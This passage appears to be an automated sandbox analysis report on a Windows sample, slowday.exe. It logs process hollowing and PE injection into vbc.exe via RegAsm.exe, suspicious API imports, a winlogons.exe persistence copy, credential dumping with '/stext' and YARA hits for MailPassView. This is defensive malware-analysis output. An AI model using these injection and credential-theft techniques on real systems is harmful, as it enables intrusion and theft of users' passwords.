            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regions
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 21F008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3AF008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3FE008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 301008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 262008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 204008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3E7008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 362008
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 307008
            .NET source code references suspicious native API functions
            Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 7.3.winlogons.exe.3790000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.0.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: 8.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
            Source: C:\Users\user\Desktop\slowday.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
            Source: slowday.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: RegAsm.exe, 00000001.00000002.507261968.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: slowday.exeBinary or memory string: Shell_TrayWnd
            Source: winlogons.exe, 00000007.00000003.281870981.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.270071702.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.269434060.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [CLASS:Progman]
            Source: C:\Users\user\Desktop\slowday.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_004083A1 GetVersionExW,

            Stealing of Sensitive Information

            barindex
            Yara detected MailPassView
            Source: Yara matchFile source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.66d5bd0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
